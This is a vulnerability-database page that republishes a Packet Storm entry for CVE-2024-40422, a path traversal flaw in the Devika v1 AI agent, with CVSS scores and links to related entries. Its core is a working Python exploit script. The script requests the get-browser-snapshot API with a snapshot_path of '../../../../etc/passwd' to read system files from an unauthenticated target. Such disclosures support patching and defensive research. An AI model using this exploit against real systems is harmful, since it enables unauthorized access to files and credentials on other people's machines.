Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAlperen ErgelPACKETSTORM:179904
HistoryAug 05, 2024 - 12:00 a.m.

Devika 1 Path Traversal

2024-08-0500:00:00
Alperen Ergel
packetstormsecurity.com
71
devika v1
path traversal
directory traversal
vulnerability
windows 11
cve-2024-40422
devikaai.

CVSS3

9.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

AI Score

7.1

Confidence

Low

EPSS

0.067

Percentile

93.9%

JSON
`# Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter  
# Google Dork: N/A  
# Date: 2024-06-29  
# Exploit Author: Alperen Ergel  
# Contact: @alpernae (IG/X)  
# Vendor Homepage: https://devikaai.co/  
# Software Link: https://github.com/stitionai/devika  
# Version: v1  
# Tested on: Windows 11 Home Edition  
# CVE: CVE-2024-40422  
  
#!/usr/bin/python  
  
import argparse  
import requests  
  
def exploit(target_url):  
url = f'http://{target_url}/api/get-browser-snapshot'  
params = {  
'snapshot_path': '../../../../etc/passwd'  
}  
  
response = requests.get(url, params=params)  
print(response.text)  
  
if __name__ == "__main__":  
parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')  
parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True)  
args = parser.parse_args()  
  
exploit(args.target)  
  
  
`

Related

exploitdb 1
githubexploit 3
nvd 1
cvelist 1
vulnrichment 1
cve 1
nuclei 1
zdt 1
openvas 1
exploitdb
exploitdb
Devika v1 - Path Traversal via 'snapshot_path'
2024-08-04 00:00:00
githubexploit
githubexploit
Exploit for Path Traversal in Stitionai Devika
2024-08-06 07:09:47
Exploit for Path Traversal in Stitionai Devika
2024-07-03 21:43:15
Exploit for Path Traversal in Stitionai Devika
2024-08-05 22:21:06
nvd
nvd
CVE-2024-40422
2024-07-24 16:15:07
cvelist
cvelist
CVE-2024-40422
2024-07-24 00:00:00
vulnrichment
vulnrichment
CVE-2024-40422
2024-07-24 00:00:00
cve
cve
CVE-2024-40422
2024-07-24 16:15:07
nuclei
nuclei
Devika v1 - Path Traversal
2024-08-05 17:49:38
zdt
zdt
Devika v1 - Path Traversal via (snapshot_path) Exploit
2024-08-04 00:00:00
openvas
openvas
Generic HTTP Directory Traversal (Web Application URL Parameter) - Active Check
2017-09-26 00:00:00

CVSS3

9.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

AI Score

7.1

Confidence

Low

EPSS

0.067

Percentile

93.9%

JSON
Related for PACKETSTORM:179904
exploitdb1githubexploit3nvd1cvelist1vulnrichment1cve1nuclei1zdt1openvas1